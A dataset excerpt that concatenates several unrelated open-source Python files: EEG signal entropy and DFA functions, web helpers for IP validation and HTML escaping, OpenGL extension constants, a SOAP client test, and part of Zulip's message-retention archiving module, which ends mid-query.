# if max(abs(Em[N-M]-Em[N-M])) <= R: # index from 0, so N-M+1 is N-M v 0.01b_r1
# if in_range(Em[i], Em[N - M], R): # for Cm, there is one more iteration than Cmp
# Cm[N - M] += 1 # cross-matches on Cm[N - M]
Cm[N - M] += 1 # Cm[N - M] self-matches
# import code;code.interact(local=locals())
Cm /= (N - M +1 )
Cmp /= ( N - M )
# import code;code.interact(local=locals())
Phi_m, Phi_mp = sum(log(Cm)), sum(log(Cmp))
Ap_En = (Phi_m - Phi_mp) / (N - M)
return Ap_En
def samp_entropy(X, M, R):
"""Computer sample entropy (SampEn) of series X, specified by M and R.
SampEn is very close to ApEn.
Suppose given time series is X = [x(1), x(2), ... , x(N)]. We first build
embedding matrix Em, of dimension (N-M+1)-by-M, such that the i-th row of Em
is x(i),x(i+1), ... , x(i+M-1). Hence, the embedding lag and dimension are
1 and M-1 respectively. Such a matrix can be built by calling pyeeg function
as Em = embed_seq(X, 1, M). Then we build matrix Emp, whose only
difference with Em is that the length of each embedding sequence is M + 1
Denote the i-th and j-th row of Em as Em[i] and Em[j]. Their k-th elments
are Em[i][k] and Em[j][k] respectively. The distance between Em[i] and Em[j]
is defined as 1) the maximum difference of their corresponding scalar
components, thus, max(Em[i]-Em[j]), or 2) Euclidean distance. We say two 1-D
vectors Em[i] and Em[j] *match* in *tolerance* R, if the distance between them
is no greater than R, thus, max(Em[i]-Em[j]) <= R. Mostly, the value of R is
defined as 20% - 30% of standard deviation of X.
Pick Em[i] as a template, for all j such that 0 < j < N - M , we can
check whether Em[j] matches with Em[i]. Denote the number of Em[j],
which is in the range of Em[i], as k[i], which is the i-th element of the
vector k.
We repeat the same process on Emp and obtained Cmp[i], 0 < i < N - M.
The SampEn is defined as log(sum(Cm)/sum(Cmp))
References
----------
Costa M, Goldberger AL, Peng C-K, Multiscale entropy analysis of biolgical
signals, Physical Review E, 71:021906, 2005
See also
--------
ap_entropy: approximate entropy of a time series
Notes
-----
Extremely slow computation. Do NOT use if your dataset is not small and you
are not patient enough.
"""
N = len(X)
Em = embed_seq(X, 1, M)
Emp = embed_seq(X, 1, M + 1)
Cm, Cmp = zeros(N - M - 1) + 1e-100, zeros(N - M - 1) + 1e-100
# in case there is 0 after counting. Log(0) is undefined.
for i in xrange(0, N - M):
for j in xrange(i + 1, N - M): # no self-match
# if max(abs(Em[i]-Em[j])) <= R: # v 0.01_b_r1
if in_range(Em[i], Em[j], R):
Cm[i] += 1
# if max(abs(Emp[i] - Emp[j])) <= R: # v 0.01_b_r1
if abs(Emp[i][-1] - Emp[j][-1]) <= R: # check last one
Cmp[i] += 1
Samp_En = log(sum(Cm)/sum(Cmp))
return Samp_En
def dfa(X, Ave = None, L = None):
"""Compute Detrended Fluctuation Analysis from a time series X and length of
boxes L.
The first step to compute DFA is to integrate the signal. Let original seres
be X= [x(1), x(2), ..., x(N)].
The integrated signal Y = [y(1), y(2), ..., y(N)] is otained as follows
y(k) = \sum_{i=1}^{k}{x(i)-Ave} where Ave is the mean of X.
The second step is to partition/slice/segment the integrated sequence Y into
boxes. At least two boxes are needed for computing DFA. Box sizes are
specified by the L argument of this function. By default, it is from 1/5 of
signal length to one (x-5)-th of the signal length, where x is the nearest
power of 2 from the length of the signal, i.e., 1/16, 1/32, 1/64, 1/128, ...
In each box, a linear least square fitting is employed on data in the box.
Denote the series on fitted line as Yn. Its k-th elements, yn(k),
corresponds to y(k).
For fitting in each box, there is a residue, the sum of squares of all
offsets, difference between actual points and points on fitted line.
F(n) denotes the square root of average total residue in all boxes when box
length is n, thus
Total_Residue = \sum_{k=1}^{N}{(y(k)-yn(k))}
F(n) = \sqrt(Total_Residue/N)
The computing to F(n) is carried out for every box length n. Therefore, a
relationship between n and F(n) can be obtained. In general, F(n) increases
when n increases.
Finally, the relationship between F(n) and n is analyzed. A least square
fitting is performed between log(F(n)) and log(n). The slope of the fitting
line is the DFA value, denoted as Alpha. To white noise, Alpha should be
0.5. Higher level of signal complexity is related to higher Alpha.
Parameters
----------
X:
1-D Python list or numpy array
a time series
Ave:
integer, optional
The average value of the time series
L:
1-D Python list of integers
A list of box size, integers in ascending order
Returns
-------
Alpha:
integer
the result of DFA analysis, thus the slope of fitting line of log(F(n))
vs. log(n). where n is the
Examples
--------
>>> import pyeeg
>>> from numpy.random import randn
>>> print pyeeg.dfa(randn(4096))
0.490035110345
Reference
---------
Peng C-K, Havlin S, Stanley HE, Goldberger AL. Quantification of scaling
exponents and crossover phenomena in nonstationary heartbeat time series.
_Chaos_ 1995;5:82-87
Notes
-----
This value depends on the box sizes very much. When the input is a white
noise, this value should be 0.5. But, some choices on box sizes can lead to
the value lower or higher than 0.5, e.g. 0.38 or 0.58.
Based on many test, I set the box sizes from 1/5 of signal length to one
(x-5)-th of the signal length, where x is the nearest power of 2 from the
length of the signal, i.e., 1/16, 1/32, 1/64, 1/128, ...
You may generate a list of box sizes and pass in such a list as a parameter.
"""
X = array(X)
if Ave is None:
Ave = mean(X)
Y = cumsum(X)
Y -= Ave
if L is None:
L = floor(len(X)*1/(2**array(range(4,int(log2(len(X)))-4))))
F = zeros(len(L)) # F(n) of different given box length n
for i in xrange(0,len(L)):
n = int(L[i]) # for each box length L[i]
if n==0:
print "time series is too short while the box length is too big"
print "abort"
exit()
for j in xrange(0,len(X),n): # for each box
if j+n < len(X):
c = range(j,j+n)
c = vstack([c, ones(n)]).T # coordinates of time in the box
y = Y[j:j+n] # the value of data in the box
F[i] += lstsq(c,y)[1] # add residue in this box
F[i] /= ((len(X)/n)*n)
F = sqrt(F)
Alpha = lstsq(vstack([log(L), ones(len(L))]).T,log(F))[0][0]
return Alpha
| mit | -8,827,911,797,043,813,000 | 25.753488 | 88 | 0.63717 | false |
dahebolangkuan/ToughRADIUS | console/libs/pyforms/net.py | 11 | 4922 | #!/usr/bin/env python
#coding:utf-8
__all__ = [
"validipaddr", "validipport", "validip", "validaddr",
"urlquote",
"httpdate", "parsehttpdate",
"htmlquote", "htmlunquote", "websafe",
]
import urllib, time
try: import datetime
except ImportError: pass
def validipaddr(address):
"""
Returns True if `address` is a valid IPv4 address.
>>> validipaddr('192.168.1.1')
True
>>> validipaddr('192.168.1.800')
False
>>> validipaddr('192.168.1')
False
"""
try:
octets = address.split('.')
if len(octets) != 4:
return False
for x in octets:
if not (0 <= int(x) <= 255):
return False
except ValueError:
return False
return True
def validipport(port):
"""
Returns True if `port` is a valid IPv4 port.
>>> validipport('9000')
True
>>> validipport('foo')
False
>>> validipport('1000000')
False
"""
try:
if not (0 <= int(port) <= 65535):
return False
except ValueError:
return False
return True
def validip(ip, defaultaddr="0.0.0.0", defaultport=8080):
"""Returns `(ip_address, port)` from string `ip_addr_port`"""
addr = defaultaddr
port = defaultport
ip = ip.split(":", 1)
if len(ip) == 1:
if not ip[0]:
pass
elif validipaddr(ip[0]):
addr = ip[0]
elif validipport(ip[0]):
port = int(ip[0])
else:
raise ValueError, ':'.join(ip) + ' is not a valid IP address/port'
elif len(ip) == 2:
addr, port = ip
if not validipaddr(addr) and validipport(port):
raise ValueError, ':'.join(ip) + ' is not a valid IP address/port'
port = int(port)
else:
raise ValueError, ':'.join(ip) + ' is not a valid IP address/port'
return (addr, port)
def validaddr(string_):
"""
Returns either (ip_address, port) or "/path/to/socket" from string_
>>> validaddr('/path/to/socket')
'/path/to/socket'
>>> validaddr('8000')
('0.0.0.0', 8000)
>>> validaddr('127.0.0.1')
('127.0.0.1', 8080)
>>> validaddr('127.0.0.1:8000')
('127.0.0.1', 8000)
>>> validaddr('fff')
Traceback (most recent call last):
...
ValueError: fff is not a valid IP address/port
"""
if '/' in string_:
return string_
else:
return validip(string_)
def urlquote(val):
"""
Quotes a string for use in a URL.
>>> urlquote('://?f=1&j=1')
'%3A//%3Ff%3D1%26j%3D1'
>>> urlquote(None)
''
>>> urlquote(u'\u203d')
'%E2%80%BD'
"""
if val is None: return ''
if not isinstance(val, unicode): val = str(val)
else: val = val.encode('utf-8')
return urllib.quote(val)
def httpdate(date_obj):
"""
Formats a datetime object for use in HTTP headers.
>>> import datetime
>>> httpdate(datetime.datetime(1970, 1, 1, 1, 1, 1))
'Thu, 01 Jan 1970 01:01:01 GMT'
"""
return date_obj.strftime("%a, %d %b %Y %H:%M:%S GMT")
def parsehttpdate(string_):
"""
Parses an HTTP date into a datetime object.
>>> parsehttpdate('Thu, 01 Jan 1970 01:01:01 GMT')
datetime.datetime(1970, 1, 1, 1, 1, 1)
"""
try:
t = time.strptime(string_, "%a, %d %b %Y %H:%M:%S %Z")
except ValueError:
return None
return datetime.datetime(*t[:6])
def htmlquote(text):
r"""
Encodes `text` for raw use in HTML.
>>> htmlquote(u"<'&\">")
u'<'&">'
"""
text = text.replace(u"&", u"&") # Must be done first!
text = text.replace(u"<", u"<")
text = text.replace(u">", u">")
text = text.replace(u"'", u"'")
text = text.replace(u'"', u""")
return text
def htmlunquote(text):
r"""
Decodes `text` that's HTML quoted.
>>> htmlunquote(u'<'&">')
u'<\'&">'
"""
text = text.replace(u""", u'"')
text = text.replace(u"'", u"'")
text = text.replace(u">", u">")
text = text.replace(u"<", u"<")
text = text.replace(u"&", u"&") # Must be done last!
return text
def websafe(val):
r"""Converts `val` so that it is safe for use in Unicode HTML.
>>> websafe("<'&\">")
u'<'&">'
>>> websafe(None)
u''
>>> websafe(u'\u203d')
u'\u203d'
>>> websafe('\xe2\x80\xbd')
u'\u203d'
"""
if val is None:
return u''
elif isinstance(val, str):
val = val.decode('utf-8')
elif not isinstance(val, unicode):
val = unicode(val)
return htmlquote(val)
if __name__ == "__main__":
import doctest
doctest.testmod()
| bsd-2-clause | -5,806,683,970,622,282,000 | 24.905263 | 78 | 0.514019 | false |
Eureka22/ASM_xf | PythonD/site_python/OpenGL/GL/SGIX/clipmap.py | 2 | 1173 | import string
__version__ = string.split('$Revision: 1.5 $')[1]
__date__ = string.join(string.split('$Date: 2001/07/20 23:53:31 $')[1:3], ' ')
__author__ = 'Tarn Weisner Burton <[email protected]>'
__doc__ = 'http://oss.sgi.com/projects/ogl-sample/registry/SGIX/clipmap.txt'
__api_version__ = 0x109
GL_LINEAR_CLIPMAP_LINEAR_SGIX = 0x8170
GL_TEXTURE_CLIPMAP_CENTER_SGIX = 0x8171
GL_TEXTURE_CLIPMAP_FRAME_SGIX = 0x8172
GL_TEXTURE_CLIPMAP_OFFSET_SGIX = 0x8173
GL_TEXTURE_CLIPMAP_VIRTUAL_DEPTH_SGIX = 0x8174
GL_TEXTURE_CLIPMAP_LOD_OFFSET_SGIX = 0x8175
GL_TEXTURE_CLIPMAP_DEPTH_SGIX = 0x8176
GL_MAX_CLIPMAP_DEPTH_SGIX = 0x8177
GL_MAX_CLIPMAP_VIRTUAL_DEPTH_SGIX = 0x8178
GL_NEAREST_CLIPMAP_NEAREST_SGIX = 0x844D
GL_NEAREST_CLIPMAP_LINEAR_SGIX = 0x844E
GL_LINEAR_CLIPMAP_NEAREST_SGIX = 0x844F
def glInitClipmapSGIX():
from OpenGL.GL import __has_extension
return __has_extension("GL_SGIX_clipmap")
def __info():
if glInitClipmapSGIX():
return [('GL_MAX_CLIPMAP_DEPTH_SGIX', GL_MAX_CLIPMAP_DEPTH_SGIX, 'i')
('GL_MAX_CLIPMAP_VIRTUAL_DEPTH_SGIX', GL_MAX_CLIPMAP_VIRTUAL_DEPTH_SGIX, 'i')]
| gpl-2.0 | 681,592,344,489,812,600 | 38.448276 | 88 | 0.68798 | false |
marceltschoppch/osa | tests/test_client.py | 2 | 2731 | #!/usr/bin/env python
# test_client.py - test Client class, part of osa.
# Copyright 2013 Sergey Bozhenkov, boz at ipp.mpg.de
# Licensed under LGPLv3 or later, see the COPYING file.
import os
import sys
sys.path.insert(0, "../")
from osa.client import Client
from osa.wsdl import *
from osa.method import *
from osa.xmltypes import *
from tests.base import BaseTest
import unittest
if sys.version_info[0] < 3:
from urllib2 import urlopen, HTTPError, URLError
else:
from urllib.request import urlopen, HTTPError, URLError
basestring = str
wsdl_url = 'http://lxpowerboz:88/services/python/HelloWorldService?wsdl'
test_path = os.path.abspath(os.path.dirname(__file__))
class TestClient(BaseTest):
def setUp(self):
self.client = Client(self.test_files['test.wsdl'])
def tearDown(self):
self.client = None
def test_init(self):
self.assertEqual(self.client.names, ["service HelloWorldService"])
for t in ("Person", "Name", "echoString", "sayHello"):
self.assertTrue(hasattr(self.client.types, t))
self.assertEqual(type(getattr(self.client.types, t)), ComplexTypeMeta)
for method in ("testMe", "giveMessage", "echoString", "sayHello", "faultyThing"):
self.assertTrue(hasattr(self.client.service, method))
self.assertEqual(type(getattr(self.client.service, method)), Method)
def test_giveMessage(self):
try:
urlopen("http://lxpowerboz:88")
except HTTPError:
pass
except URLError:
return
res = self.client.service.giveMessage()
self.assertTrue(isinstance(res, basestring))
def test_echoString(self):
try:
urlopen("http://lxpowerboz:88")
except HTTPError:
pass
except URLError:
return
self.assertEqual('my message 1', self.client.service.echoString('my message 1'))
def test_sayHello(self):
try:
urlopen("http://lxpowerboz:88")
except HTTPError:
pass
except URLError:
return
n = self.client.types.Name()
n.firstName = "first"
n.lastName = "last"
p = self.client.types.Person()
p.name = n
p.age = 30
p.weight = 80
p.height = 175
self.assertEqual(['Hello, first\n']*5, self.client.service.sayHello(p, 5))
def test_faultyThing(self):
try:
urlopen("http://lxpowerboz:88")
except HTTPError:
pass
except URLError:
return
try:
self.client.service.faultyThing()
except RuntimeError as e:
self.assertFalse(str(e).find('4u!') == -1)
| lgpl-3.0 | -5,961,999,119,692,928,000 | 29.010989 | 89 | 0.611131 | false |
showell/zulip | zerver/lib/retention.py | 4 | 26568 | # Core implementation of message retention policies and low-level
# helpers for deleting messages.
#
# Because bugs in code that deletes message content can cause
# irreversible harm in installations without backups, this is a
# particularly sensitive system that requires careful design,
# thoughtful database transaction boundaries, and a well-written test
# suite to make bugs unlikely and mitigate their impact.
#
# The core design principle of this system is we never delete a live
# Message/Reaction/etc. object. Instead, we use move_rows, which moves
# objects to a "deleted objects" table like ArchiveMessage, recording
# the change using a structure linked to an ArchiveTransaction object
# that can be used to undo that deletion transaction in a clean
# fashion.
#
# We move all of the data associated with a given block of messages in
# a single database transaction in order to avoid broken intermediate
# states where, for example, a message's reactions were deleted but
# not the messages themselves.
#
# And then a separate process deletes ArchiveTransaction objects
# ARCHIVED_DATA_VACUUMING_DELAY_DAYS after they were created.
#
# Because of the nice properties of this deletion system, we use the
# same system for routine deletions via the Zulip UI (deleting a
# message or group of messages) as we use for message retention policy
# deletions.
import logging
import time
from datetime import timedelta
from typing import Any, Dict, List, Mapping, Optional, Tuple, Union
from django.conf import settings
from django.db import connection, transaction
from django.db.models import Model
from django.utils.timezone import now as timezone_now
from psycopg2.sql import SQL, Composable, Identifier, Literal
from zerver.lib.logging_util import log_to_file
from zerver.lib.request import RequestVariableConversionError
from zerver.models import (
ArchivedAttachment,
ArchivedReaction,
ArchivedSubMessage,
ArchivedUserMessage,
ArchiveTransaction,
Attachment,
Message,
Reaction,
Realm,
Recipient,
Stream,
SubMessage,
UserMessage,
get_user_including_cross_realm,
)
logger = logging.getLogger('zulip.retention')
log_to_file(logger, settings.RETENTION_LOG_PATH)
MESSAGE_BATCH_SIZE = 1000
STREAM_MESSAGE_BATCH_SIZE = 100
TRANSACTION_DELETION_BATCH_SIZE = 100
# This data structure declares the details of all database tables that
# hang off the Message table (with a foreign key to Message being part
# of its primary lookup key). This structure allows us to share the
# code for managing these related tables.
models_with_message_key: List[Dict[str, Any]] = [
{
'class': Reaction,
'archive_class': ArchivedReaction,
'table_name': 'zerver_reaction',
'archive_table_name': 'zerver_archivedreaction',
},
{
'class': SubMessage,
'archive_class': ArchivedSubMessage,
'table_name': 'zerver_submessage',
'archive_table_name': 'zerver_archivedsubmessage',
},
{
'class': UserMessage,
'archive_class': ArchivedUserMessage,
'table_name': 'zerver_usermessage',
'archive_table_name': 'zerver_archivedusermessage',
},
]
@transaction.atomic(savepoint=False)
def move_rows(
base_model: Model,
raw_query: Composable,
*,
src_db_table: Optional[str]=None,
returning_id: bool=False,
**kwargs: Composable,
) -> List[int]:
"""Core helper for bulk moving rows between a table and its archive table"""
if src_db_table is None:
# Use base_model's db_table unless otherwise specified.
src_db_table = base_model._meta.db_table
src_fields = [
Identifier(src_db_table, field.column)
for field in base_model._meta.fields
]
dst_fields = [Identifier(field.column) for field in base_model._meta.fields]
sql_args = {
'src_fields': SQL(',').join(src_fields),
'dst_fields': SQL(',').join(dst_fields),
}
sql_args.update(kwargs)
with connection.cursor() as cursor:
cursor.execute(
raw_query.format(**sql_args),
)
if returning_id:
return [id for (id,) in cursor.fetchall()] # return list of row ids
else:
return []
def run_archiving_in_chunks(
query: Composable,
type: int,
realm: Optional[Realm]=None,
chunk_size: int=MESSAGE_BATCH_SIZE,
**kwargs: Composable,
) -> int:
# This function is carefully designed to achieve our
# transactionality goals: A batch of messages is either fully
# archived-and-deleted or not transactionally.
#
# We implement this design by executing queries that archive messages and their related objects
# (such as UserMessage, Reaction, and Attachment) inside the same transaction.atomic() block.
assert type in (ArchiveTransaction.MANUAL, ArchiveTransaction.RETENTION_POLICY_BASED)
message_count = 0
while True:
start_time = time.time()
with transaction.atomic():
archive_transaction = ArchiveTransaction.objects.create(type=type, realm=realm)
new_chunk = move_rows(
Message,
query,
chunk_size=Literal(chunk_size),
returning_id=Literal(True),
archive_transaction_id=Literal(archive_transaction.id),
**kwargs,
)
if new_chunk:
move_related_objects_to_archive(new_chunk)
delete_messages(new_chunk)
message_count += len(new_chunk)
else:
archive_transaction.delete() # Nothing was archived
total_time = time.time() - start_time
# This line needs to be outside of the atomic block, to capture the actual moment
# archiving of the chunk is finished (since Django does some significant additional work
# when leaving the block).
if len(new_chunk) > 0:
logger.info("Archived %s messages in %.2fs in transaction %s.",
len(new_chunk), total_time, archive_transaction.id)
# We run the loop, until the query returns fewer results than chunk_size,
# which means we are done:
if len(new_chunk) < chunk_size:
break
return message_count
# Note about batching these Message archiving queries:
# We can simply use LIMIT without worrying about OFFSETs and ordering
# while executing batches, because any Message already archived (in the previous batch)
# will not show up in the "SELECT ... FROM zerver_message ..." query for the next batches.
def move_expired_messages_to_archive_by_recipient(recipient: Recipient,
message_retention_days: int, realm: Realm,
chunk_size: int=MESSAGE_BATCH_SIZE) -> int:
assert message_retention_days != -1
# This function will archive appropriate messages and their related objects.
query = SQL("""
INSERT INTO zerver_archivedmessage ({dst_fields}, archive_transaction_id)
SELECT {src_fields}, {archive_transaction_id}
FROM zerver_message
WHERE zerver_message.recipient_id = {recipient_id}
AND zerver_message.date_sent < {check_date}
LIMIT {chunk_size}
ON CONFLICT (id) DO UPDATE SET archive_transaction_id = {archive_transaction_id}
RETURNING id
""")
check_date = timezone_now() - timedelta(days=message_retention_days)
return run_archiving_in_chunks(
query,
type=ArchiveTransaction.RETENTION_POLICY_BASED,
realm=realm,
recipient_id=Literal(recipient.id),
check_date=Literal(check_date.isoformat()),
chunk_size=chunk_size,
)
def move_expired_personal_and_huddle_messages_to_archive(realm: Realm,
chunk_size: int=MESSAGE_BATCH_SIZE,
) -> int:
message_retention_days = realm.message_retention_days
assert message_retention_days != -1
check_date = timezone_now() - timedelta(days=message_retention_days)
# This function will archive appropriate messages and their related objects.
cross_realm_bot_ids = [
get_user_including_cross_realm(email).id
for email in settings.CROSS_REALM_BOT_EMAILS
]
recipient_types = (Recipient.PERSONAL, Recipient.HUDDLE)
# Archive expired personal and huddle Messages in the realm, except cross-realm messages.
# The condition zerver_userprofile.realm_id = {realm_id} assures the row won't be
# a message sent by a cross-realm bot, because cross-realm bots have their own separate realm.
query = SQL("""
INSERT INTO zerver_archivedmessage ({dst_fields}, archive_transaction_id)
SELECT {src_fields}, {archive_transaction_id}
FROM zerver_message
INNER JOIN zerver_recipient ON zerver_recipient.id = zerver_message.recipient_id
INNER JOIN zerver_userprofile ON zerver_userprofile.id = zerver_message.sender_id
WHERE zerver_userprofile.realm_id = {realm_id}
AND zerver_recipient.type in {recipient_types}
AND zerver_message.date_sent < {check_date}
LIMIT {chunk_size}
ON CONFLICT (id) DO UPDATE SET archive_transaction_id = {archive_transaction_id}
RETURNING id
""")
message_count = run_archiving_in_chunks(
query,
type=ArchiveTransaction.RETENTION_POLICY_BASED,
realm=realm,
cross_realm_bot_ids=Literal(tuple(cross_realm_bot_ids)),
realm_id=Literal(realm.id),
recipient_types=Literal(recipient_types),
check_date=Literal(check_date.isoformat()),
chunk_size=chunk_size,
)
# Archive cross-realm personal messages to users in the realm. We
# don't archive cross-realm huddle messages via retention policy,
# as we don't support them as a feature in Zulip, and the query to
# find and delete them would be a lot of complexity and potential
# performance work for a case that doesn't actually happen.
query = SQL("""
INSERT INTO zerver_archivedmessage ({dst_fields}, archive_transaction_id)
SELECT {src_fields}, {archive_transaction_id}
FROM zerver_message
INNER JOIN zerver_recipient ON zerver_recipient.id = zerver_message.recipient_id
INNER JOIN zerver_userprofile recipient_profile ON recipient_profile.id = zerver_recipient.type_id
INNER JOIN zerver_userprofile sender_profile ON sender_profile.id = zerver_message.sender_id
WHERE sender_profile.id IN {cross_realm_bot_ids}
AND recipient_profile.realm_id = {realm_id}
AND zerver_recipient.type = {recipient_personal}
AND zerver_message.date_sent < {check_date}
LIMIT {chunk_size}
ON CONFLICT (id) DO UPDATE SET archive_transaction_id = {archive_transaction_id}
RETURNING id
""")
message_count += run_archiving_in_chunks(
query,
type=ArchiveTransaction.RETENTION_POLICY_BASED,
realm=realm,
cross_realm_bot_ids=Literal(tuple(cross_realm_bot_ids)),
realm_id=Literal(realm.id),
recipient_personal=Literal(Recipient.PERSONAL),
check_date=Literal(check_date.isoformat()),
chunk_size=chunk_size,
)
return message_count
def move_models_with_message_key_to_archive(msg_ids: List[int]) -> None:
assert len(msg_ids) > 0
for model in models_with_message_key:
query = SQL("""
INSERT INTO {archive_table_name} ({dst_fields})
SELECT {src_fields}
FROM {table_name}
WHERE {table_name}.message_id IN {message_ids}
ON CONFLICT (id) DO NOTHING
""")
move_rows(
model['class'],
query,
table_name=Identifier(model['table_name']),
archive_table_name=Identifier(model['archive_table_name']),
message_ids=Literal(tuple(msg_ids)),
)
# Attachments can't use the common models_with_message_key system,
# because they can be referenced by more than one Message, and we only
# want to delete the Attachment if we're deleting the last message
# referencing them.
def move_attachments_to_archive(msg_ids: List[int]) -> None:
assert len(msg_ids) > 0
query = SQL("""
INSERT INTO zerver_archivedattachment ({dst_fields})
SELECT {src_fields}
FROM zerver_attachment
INNER JOIN zerver_attachment_messages
ON zerver_attachment_messages.attachment_id = zerver_attachment.id
WHERE zerver_attachment_messages.message_id IN {message_ids}
GROUP BY zerver_attachment.id
ON CONFLICT (id) DO NOTHING
""")
move_rows(Attachment, query, message_ids=Literal(tuple(msg_ids)))
def move_attachment_messages_to_archive(msg_ids: List[int]) -> None:
assert len(msg_ids) > 0
query = SQL("""
INSERT INTO zerver_archivedattachment_messages (id, archivedattachment_id, archivedmessage_id)
SELECT zerver_attachment_messages.id, zerver_attachment_messages.attachment_id,
zerver_attachment_messages.message_id
FROM zerver_attachment_messages
WHERE zerver_attachment_messages.message_id IN %(message_ids)s
ON CONFLICT (id) DO NOTHING
""")
with connection.cursor() as cursor:
cursor.execute(query, dict(message_ids=tuple(msg_ids)))
def delete_messages(msg_ids: List[int]) -> None:
# Important note: This also deletes related objects with a foreign
# key to Message (due to `on_delete=CASCADE` in our models
# configuration), so we need to be sure we've taken care of
# archiving the messages before doing this step.
Message.objects.filter(id__in=msg_ids).delete()
def delete_expired_attachments(realm: Realm) -> None:
attachments_deleted, _ = Attachment.objects.filter(
messages__isnull=True,
realm_id=realm.id,
id__in=ArchivedAttachment.objects.filter(realm_id=realm.id),
).delete()
if attachments_deleted > 0:
logger.info("Cleaned up %s attachments for realm %s", attachments_deleted, realm.string_id)
def move_related_objects_to_archive(msg_ids: List[int]) -> None:
move_models_with_message_key_to_archive(msg_ids)
move_attachments_to_archive(msg_ids)
move_attachment_messages_to_archive(msg_ids)
def archive_messages_by_recipient(recipient: Recipient, message_retention_days: int,
realm: Realm, chunk_size: int=MESSAGE_BATCH_SIZE) -> int:
return move_expired_messages_to_archive_by_recipient(recipient, message_retention_days,
realm, chunk_size)
def archive_personal_and_huddle_messages(realm: Realm, chunk_size: int=MESSAGE_BATCH_SIZE) -> None:
logger.info("Archiving personal and huddle messages for realm %s", realm.string_id)
message_count = move_expired_personal_and_huddle_messages_to_archive(realm, chunk_size)
logger.info("Done. Archived %s messages", message_count)
def archive_stream_messages(realm: Realm, streams: List[Stream], chunk_size: int=STREAM_MESSAGE_BATCH_SIZE) -> None:
if not streams:
return
logger.info("Archiving stream messages for realm %s", realm.string_id)
retention_policy_dict: Dict[int, int] = {}
for stream in streams:
# if stream.message_retention_days is null, use the realm's policy
if stream.message_retention_days:
retention_policy_dict[stream.id] = stream.message_retention_days
else:
assert realm.message_retention_days != -1
retention_policy_dict[stream.id] = realm.message_retention_days
recipients = [stream.recipient for stream in streams]
message_count = 0
for recipient in recipients:
message_count += archive_messages_by_recipient(
recipient, retention_policy_dict[recipient.type_id], realm, chunk_size,
)
logger.info("Done. Archived %s messages.", message_count)
def archive_messages(chunk_size: int=MESSAGE_BATCH_SIZE) -> None:
logger.info("Starting the archiving process with chunk_size %s", chunk_size)
for realm, streams in get_realms_and_streams_for_archiving():
archive_stream_messages(realm, streams, chunk_size=STREAM_MESSAGE_BATCH_SIZE)
if realm.message_retention_days != -1:
archive_personal_and_huddle_messages(realm, chunk_size)
# Messages have been archived for the realm, now we can clean up attachments:
delete_expired_attachments(realm)
def get_realms_and_streams_for_archiving() -> List[Tuple[Realm, List[Stream]]]:
"""
This function constructs a list of (realm, streams_of_the_realm) tuples
where each realm is a Realm that requires calling the archiving functions on it,
and streams_of_the_realm is a list of streams of the realm to call archive_stream_messages with.
The purpose of this is performance - for servers with thousands of realms, it is important
to fetch all this data in bulk.
"""
realm_id_to_realm = {}
realm_id_to_streams_list: Dict[int, List[Stream]] = {}
# All realms with a retention policy set qualify for archiving:
for realm in Realm.objects.exclude(message_retention_days=-1):
realm_id_to_realm[realm.id] = realm
realm_id_to_streams_list[realm.id] = []
# Now we find all streams that require archiving.
# First category are streams in retention-enabled realms,
# that don't have retention explicitly disabled (through the value -1).
query_one = Stream.objects.exclude(message_retention_days=-1) \
.exclude(realm__message_retention_days=-1) \
.select_related('realm', 'recipient')
# Second category are streams that are in realms without a realm-wide retention policy,
# but have their own stream-specific policy enabled.
query_two = Stream.objects.filter(realm__message_retention_days=-1) \
.exclude(message_retention_days__isnull=True) \
.exclude(message_retention_days=-1) \
.select_related('realm', 'recipient')
query = query_one.union(query_two)
for stream in query:
realm = stream.realm
realm_id_to_realm[realm.id] = realm
if realm.id not in realm_id_to_streams_list:
realm_id_to_streams_list[realm.id] = []
realm_id_to_streams_list[realm.id].append(stream)
return [(realm_id_to_realm[realm_id], realm_id_to_streams_list[realm_id])
for realm_id in realm_id_to_realm]
def move_messages_to_archive(message_ids: List[int], realm: Optional[Realm]=None,
chunk_size: int=MESSAGE_BATCH_SIZE) -> None:
query = SQL("""
INSERT INTO zerver_archivedmessage ({dst_fields}, archive_transaction_id)
SELECT {src_fields}, {archive_transaction_id}
FROM zerver_message
WHERE zerver_message.id IN {message_ids}
LIMIT {chunk_size}
ON CONFLICT (id) DO UPDATE SET archive_transaction_id = {archive_transaction_id}
RETURNING id
""")
count = run_archiving_in_chunks(
query,
type=ArchiveTransaction.MANUAL,
message_ids=Literal(tuple(message_ids)),
realm=realm,
chunk_size=chunk_size,
)
if count == 0:
raise Message.DoesNotExist
# Clean up attachments:
archived_attachments = ArchivedAttachment.objects.filter(messages__id__in=message_ids).distinct()
Attachment.objects.filter(messages__isnull=True, id__in=archived_attachments).delete()
def restore_messages_from_archive(archive_transaction_id: int) -> List[int]:
query = SQL("""
INSERT INTO zerver_message ({dst_fields})
SELECT {src_fields}
FROM zerver_archivedmessage
WHERE zerver_archivedmessage.archive_transaction_id = {archive_transaction_id}
ON CONFLICT (id) DO NOTHING
RETURNING id
""")
return move_rows(
Message,
query,
src_db_table='zerver_archivedmessage',
returning_id=Literal(True),
archive_transaction_id=Literal(archive_transaction_id),
)
def restore_models_with_message_key_from_archive(archive_transaction_id: int) -> None:
for model in models_with_message_key:
query = SQL("""
INSERT INTO {table_name} ({dst_fields})
SELECT {src_fields}
FROM {archive_table_name}
INNER JOIN zerver_archivedmessage ON {archive_table_name}.message_id = zerver_archivedmessage.id
WHERE zerver_archivedmessage.archive_transaction_id = {archive_transaction_id}
ON CONFLICT (id) DO NOTHING
""")
move_rows(
model['class'],
query,
src_db_table=model['archive_table_name'],
table_name=Identifier(model['table_name']),
archive_transaction_id=Literal(archive_transaction_id),
archive_table_name=Identifier(model['archive_table_name']),
)
def restore_attachments_from_archive(archive_transaction_id: int) -> None:
query = SQL("""
INSERT INTO zerver_attachment ({dst_fields})
SELECT {src_fields}
FROM zerver_archivedattachment
INNER JOIN zerver_archivedattachment_messages
ON zerver_archivedattachment_messages.archivedattachment_id = zerver_archivedattachment.id
INNER JOIN zerver_archivedmessage
ON zerver_archivedattachment_messages.archivedmessage_id = zerver_archivedmessage.id
WHERE zerver_archivedmessage.archive_transaction_id = {archive_transaction_id}
GROUP BY zerver_archivedattachment.id
ON CONFLICT (id) DO NOTHING
""")
move_rows(
Attachment,
query,
src_db_table='zerver_archivedattachment',
archive_transaction_id=Literal(archive_transaction_id),
)
def restore_attachment_messages_from_archive(archive_transaction_id: int) -> None:
query = SQL("""
INSERT INTO zerver_attachment_messages (id, attachment_id, message_id)
SELECT zerver_archivedattachment_messages.id,
zerver_archivedattachment_messages.archivedattachment_id,
zerver_archivedattachment_messages.archivedmessage_id
